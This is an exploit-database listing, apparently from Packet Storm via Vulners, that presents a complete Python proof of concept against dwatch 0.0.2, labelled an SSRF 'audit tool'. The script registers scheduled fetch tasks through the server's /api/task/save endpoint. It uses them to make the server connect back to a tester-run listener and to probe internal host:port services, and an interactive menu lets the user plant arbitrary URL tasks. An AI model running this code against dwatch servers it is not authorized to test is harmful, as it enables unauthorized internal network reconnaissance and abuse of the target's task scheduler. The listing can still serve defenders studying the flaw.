Lucene search
K

📄 dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool

🗓️ 01 Jun 2026 00:00:00 · Reported by indoushka · Type:
packetstorm
 packetstorm
🔗 packetstorm.news · 👁 56 Views

Security tool to test network boundaries and detect server side request forgery behavior.

Code
==================================================================================================================================
    | # Title     : dwatch 0.0.2 SSRF Boundary and Network Isolation Audit Tool                                                      |
    | # Author    : indoushka                                                                                                        |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |
    | # Vendor    : https://github.com/dhjz/dwatch/                                                                                  |
    ==================================================================================================================================
    
    [+] Summary    : A security utility that tests network boundary enforcement and detects potential Server-Side Request Forgery (SSRF) behavior in systems resembling a hypothetical dwatch environment.
    				 
    [+] POC        : 
    
    #!/usr/bin/env python3
    
    
    import re
    import csv
    import json
    import time
    import socket
    import logging
    import threading
    import argparse
    import urllib3
    from pathlib import Path
    from datetime import datetime
    from typing import Dict, List, Optional, Tuple
    from urllib.parse import urlparse, urljoin
    import requests
    
    # Root logging setup: INFO and above, rendered as "time - [LEVEL] - message".
    _LOG_FORMAT = '%(asctime)s - [%(levelname)s] - %(message)s'
    logging.basicConfig(format=_LOG_FORMAT, level=logging.INFO)

    # Named logger shared by every component of this script.
    logger = logging.getLogger("DWatchAuditor")

    # Suppress urllib3's InsecureRequestWarning for the whole process.
    _SUPPRESSED_WARNING = urllib3.exceptions.InsecureRequestWarning
    urllib3.disable_warnings(_SUPPRESSED_WARNING)
    
    
    class DWatchAuditorCore:
        """Main engine: manages the connection to the dwatch server and checks network restrictions.

        The auditor registers tasks on the target through ``<base_url>/api/task/save``
        and, for the boundary check, runs a short-lived TCP listener that records
        the first inbound connection.

        Attributes:
            base_url: Normalised target URL (scheme, host and path, no trailing slash).
            callback_host: Host advertised in the callback URL; auto-detected when empty.
            callback_port: TCP port the callback listener binds to.
            verbose: When true, each submitted payload is logged before sending.
            session: ``requests.Session`` used for every call to the target.
            save_endpoint: Full URL of the task-registration endpoint.
            created_tasks: Tasks the target accepted, as ``name``/``url``/``spec`` dicts.
            callback_event: Set once an inbound connection has been recorded.
            callback_data: Recorded inbound connections (``sender`` address and ``raw`` request).
            lock: Guards ``callback_data``.
        """

        # Seconds to wait for the target to call back after the task is registered.
        CALLBACK_WAIT_SECONDS = 12
        # accept() poll interval; bounds how long the listener needs to notice a stop request.
        ACCEPT_POLL_SECONDS = 0.5
        # Upper bound, in seconds, on reading the request from an accepted connection.
        CLIENT_READ_TIMEOUT = 3

        def __init__(self, target: str, callback_host: Optional[str] = None,
                     callback_port: int = 8888, verbose: bool = False):
            """Validate the target and prepare the HTTP session.

            Args:
                target: Target URL or bare ``host[:port][/path]``; ``http://`` is
                    assumed when no scheme is given.
                callback_host: Host the target should call back to, or ``None`` to
                    auto-detect at test time.
                callback_port: Port for the callback listener (1-65535).
                verbose: Log each payload before it is submitted.

            Raises:
                ValueError: If the target has no network location, uses a scheme
                    other than http/https, or the callback port is out of range.
            """
            target = target.strip()
            parsed = urlparse(target if "://" in target else f"http://{target}")
            if not parsed.netloc:
                raise ValueError(f"Invalid target URL structure: {target}")
            # Fail fast: the session below only talks HTTP(S).
            if parsed.scheme not in ("http", "https"):
                raise ValueError(f"Unsupported target URL scheme: {parsed.scheme}")
            # bind() raises OverflowError (not OSError) for ports above 65535, so
            # reject bad ports here instead of inside the listener.
            if not 0 < callback_port < 65536:
                raise ValueError(f"Callback port out of range (1-65535): {callback_port}")

            self.base_url = f"{parsed.scheme}://{parsed.netloc}{parsed.path}".rstrip("/")

            self.callback_host = callback_host
            self.callback_port = callback_port
            self.verbose = verbose

            self.session = requests.Session()
            self.session.headers.update({
                'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) BoundaryAuditor/1.0',
                'Content-Type': 'application/json'
            })

            self.save_endpoint = urljoin(self.base_url + "/", "api/task/save")
            self.created_tasks: List[Dict] = []

            self.callback_event = threading.Event()
            self.callback_data: List[Dict] = []
            self.lock = threading.Lock()
            # Separate stop flag so "shut the listener down" is never mistaken
            # for "a callback arrived".
            self._stop_event = threading.Event()

        def _get_local_ip(self) -> str:
            """Return the local address used for outbound traffic, or 127.0.0.1 on failure."""
            try:
                # Connecting a UDP socket only selects a route; the local end of
                # that route is the address we advertise.
                with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
                    s.connect(("8.8.8.8", 80))
                    return s.getsockname()[0]
            except OSError:
                return "127.0.0.1"

        def create_audit_task(self, name: str, payload_url: str, spec: str = "*/5 * * * * *") -> bool:
            """Register a task on the target that fetches ``payload_url`` on schedule ``spec``.

            Args:
                name: Task name sent to the target.
                payload_url: URL the target is asked to request.
                spec: Schedule expression sent in the ``spec`` field.

            Returns:
                True when the target answers HTTP 200 with a non-empty body (the
                task is then appended to ``created_tasks``); False otherwise,
                including on transport errors.
            """
            payload = {"name": name, "url": payload_url, "spec": spec}

            try:
                if self.verbose:
                    logger.info(f"Submitting audit payload: {name} -> {payload_url}")

                response = self.session.post(self.save_endpoint, json=payload, timeout=10)
            except requests.RequestException as e:
                logger.error(f"Network transport error during task creation: {e}")
                return False

            if response.status_code == 200 and response.text:
                logger.info(f"Audit task '{name}' registered successfully.")
                self.created_tasks.append({'name': name, 'url': payload_url, 'spec': spec})
                return True

            logger.error(f"Failed to create task. HTTP Status: {response.status_code}")
            return False

        def verify_boundary_leak(self) -> bool:
            """Ask the target to fetch a callback URL and report whether it connected back.

            The listener is bound before the task is registered, and is always
            stopped and joined before returning, so the port is free for the next
            run regardless of the outcome.

            Returns:
                True if an inbound connection was recorded within the wait window;
                False if the listener could not start, the task was rejected, or
                nothing connected.
            """
            if not self.callback_host:
                self.callback_host = self._get_local_ip()

            timestamp = datetime.now().strftime("%Y%m%d_%H%M%S")
            callback_url = f"http://{self.callback_host}:{self.callback_port}/ssrf_token_{timestamp}"
            task_name = f"Boundary_Audit_{timestamp}"

            logger.info(f"Callback URL: {callback_url}")

            # Bind synchronously: a busy port is reported immediately instead of
            # registering a task on the target and waiting for a callback that
            # can never be received.
            try:
                server_socket = self._open_callback_listener()
            except (OSError, OverflowError) as e:
                logger.error(f"Callback listener error: {e}")
                return False

            self.callback_event.clear()
            self._stop_event.clear()

            server_thread = threading.Thread(
                target=self._run_callback_socket, args=(server_socket,), daemon=True
            )
            server_thread.start()

            submitted = False
            try:
                submitted = self.create_audit_task(task_name, callback_url, spec="* * * * * *")
                if submitted:
                    logger.info(
                        f"Waiting for inbound connection (timeout {self.CALLBACK_WAIT_SECONDS}s)..."
                    )
                    self.callback_event.wait(timeout=self.CALLBACK_WAIT_SECONDS)
            finally:
                # Runs on every path (rejected task, timeout, Ctrl-C) so the
                # listener thread and its port never outlive this call.
                self._stop_event.set()
                server_thread.join(
                    timeout=self.ACCEPT_POLL_SECONDS + self.CLIENT_READ_TIMEOUT + 1
                )

            if not submitted:
                return False

            # Checked after the join so a connection that was still being read
            # when the wait expired is counted.
            # NOTE(review): any inbound TCP connection counts as a hit; the request
            # path is not compared against the token in the callback URL.
            if self.callback_event.is_set():
                logger.critical("SSRF outbound boundary breach confirmed!")
                return True

            logger.warning("No inbound request captured.")
            return False

        def _open_callback_listener(self) -> socket.socket:
            """Create, bind and start listening on the callback port.

            Returns:
                A listening socket whose ``accept()`` times out every
                ``ACCEPT_POLL_SECONDS``.

            Raises:
                OSError: If the socket cannot be bound or put into listening mode.
            """
            server_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                server_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
                server_socket.bind(("0.0.0.0", self.callback_port))
                server_socket.listen(1)
                server_socket.settimeout(self.ACCEPT_POLL_SECONDS)
            except Exception:
                server_socket.close()
                raise
            return server_socket

        def _run_callback_socket(self, server_socket: Optional[socket.socket] = None) -> None:
            """Accept connections until one is recorded or a stop is requested.

            Args:
                server_socket: An already-listening socket to serve. When omitted,
                    the listener is opened here. The socket is closed on exit in
                    either case.
            """
            if server_socket is None:
                try:
                    server_socket = self._open_callback_listener()
                except (OSError, OverflowError) as e:
                    logger.error(f"Callback listener error: {e}")
                    return

            try:
                while not (self._stop_event.is_set() or self.callback_event.is_set()):
                    try:
                        client, addr = server_socket.accept()
                    except socket.timeout:
                        # Poll interval elapsed; loop to re-check the stop flags.
                        continue

                    self._handle_callback_client(client, addr)
                    # Signal only after the data is stored, so whoever is woken
                    # by the event can already read callback_data.
                    self.callback_event.set()

            except Exception as e:
                logger.error(f"Callback listener error: {e}")

            finally:
                server_socket.close()

        def _handle_callback_client(self, client: socket.socket, addr: Tuple) -> None:
            """Record one inbound connection and answer it with an empty HTTP 200."""
            with client:
                # Accepted sockets are blocking by default; bound the read so a
                # silent peer cannot hang the listener.
                client.settimeout(self.CLIENT_READ_TIMEOUT)
                try:
                    raw_request = client.recv(2048).decode("utf-8", errors="ignore")
                except OSError:
                    # The connection itself is the evidence; keep it even when
                    # nothing could be read.
                    raw_request = ""

                with self.lock:
                    self.callback_data.append({"sender": addr, "raw": raw_request})

                logger.info(f"Inbound connection from {addr[0]}:{addr[1]}")

                try:
                    client.sendall(
                        b"HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 0\r\n\r\n"
                    )
                except OSError as e:
                    logger.debug(f"Could not answer callback client: {e}")

        def check_internal_service(self, host: str, port: int) -> Dict:
            """Register a task pointing at ``http://host:port/`` and report whether it was accepted.

            Acceptance only means the target stored the task; whether the service
            is reachable has to be confirmed from the target's own logs.

            Returns:
                A dict with ``port``, ``task_accepted`` and a human-readable ``inference``.
            """
            url = f"http://{host}:{port}/"
            task_name = f"service_recon_{port}_{int(time.time())}"

            success = self.create_audit_task(task_name, url, spec="*/5 * * * * *")

            return {
                "port": port,
                "task_accepted": success,
                "inference": (
                    "Task submitted - requires log verification"
                    if success else "Blocked or unreachable endpoint"
                )
            }
    
    
    class InteractiveConsoleInterface:
        """Console menu that drives a DWatchAuditorCore from standard input."""

        def __init__(self, auditor: DWatchAuditorCore):
            self.auditor = auditor

        def display_menu(self):
            """Show the menu repeatedly and run the chosen action until "5" is entered.

            Unrecognised input is ignored and the menu is shown again.
            """
            rule = "=" * 50
            menu_lines = (
                "\n" + rule,
                "dwatch SSRF Boundary Auditor",
                rule,
                "1. Run SSRF Test",
                "2. Check Internal Port",
                "3. Create Task",
                "4. View Tasks",
                "5. Exit",
            )
            handlers = {
                "1": self._run_ssrf_test,
                "2": self._check_port,
                "3": self._create_task,
                "4": self._show_tasks,
            }

            while True:
                for line in menu_lines:
                    print(line)

                selection = input("> ").strip()
                if selection == "5":
                    return

                action = handlers.get(selection)
                if action is not None:
                    action()

        def _run_ssrf_test(self):
            """Menu option 1: run the callback-based boundary check."""
            self.auditor.verify_boundary_leak()

        def _check_port(self):
            """Menu option 2: prompt for host and port, then print the probe result as JSON."""
            host = input("Host: ").strip() or "127.0.0.1"
            try:
                port = int(input("Port: ").strip())
            except ValueError:
                print("Invalid port")
                return

            report = self.auditor.check_internal_service(host, port)
            print(json.dumps(report, indent=2))

        def _create_task(self):
            """Menu option 3: prompt for a name and URL and register the task."""
            name = input("Task name: ").strip()
            url = input("URL: ").strip()
            self.auditor.create_audit_task(name, url)

        def _show_tasks(self):
            """Menu option 4: print the tasks accepted so far as JSON."""
            print(json.dumps(self.auditor.created_tasks, indent=2))
    
    
    def main():
        """Command-line entry point.

        Options:
            -t/--target       Target URL or host (required).
            -c/--callback     Callback address as HOST[:PORT]; the port defaults to 8888.
            -i/--interactive  Start the interactive menu instead of a single check.
            -v/--verbose      Log each submitted payload.

        A malformed ``--callback`` value is reported through argparse (usage
        message, exit status 2) instead of surfacing as an unhandled ValueError.
        Errors raised while auditing are logged as fatal and not re-raised.
        """
        parser = argparse.ArgumentParser()
        parser.add_argument("-t", "--target", required=True)
        parser.add_argument("-c", "--callback")
        parser.add_argument("-i", "--interactive", action="store_true")
        parser.add_argument("-v", "--verbose", action="store_true")
        args = parser.parse_args()

        callback_host = None
        callback_port = 8888

        if args.callback:
            # Split on the last colon so "host:port" yields both parts; a value
            # without a colon is taken as the host alone.
            host_part, sep, port_part = args.callback.rpartition(":")
            callback_host = host_part if sep else args.callback

            # The host is interpolated into "http://HOST:PORT/..." later, so a
            # scheme or path here would produce a malformed callback URL.
            if "/" in callback_host:
                parser.error(
                    f"invalid callback '{args.callback}': expected HOST[:PORT] without scheme or path"
                )

            if sep:
                try:
                    callback_port = int(port_part)
                except ValueError:
                    parser.error(
                        f"invalid callback port '{port_part}': expected HOST[:PORT]"
                    )
                if not 0 < callback_port < 65536:
                    parser.error(
                        f"callback port out of range (1-65535): {callback_port}"
                    )

        try:
            auditor = DWatchAuditorCore(
                target=args.target,
                callback_host=callback_host,
                callback_port=callback_port,
                verbose=args.verbose
            )

            if args.interactive:
                InteractiveConsoleInterface(auditor).display_menu()
            else:
                logger.info("Running SSRF boundary check...")
                auditor.verify_boundary_leak()

        except Exception as e:
            logger.critical(f"Fatal error: {e}")
    
    
    # Run the CLI only when executed as a script, not when imported as a module.
    if __name__ == "__main__":
        main()
    	
    Greetings to :==============================================================================
    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
    ============================================================================================

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jun 2026 00:00 · Current
5.8 · Medium risk
Vulners AI Score: 5.8
56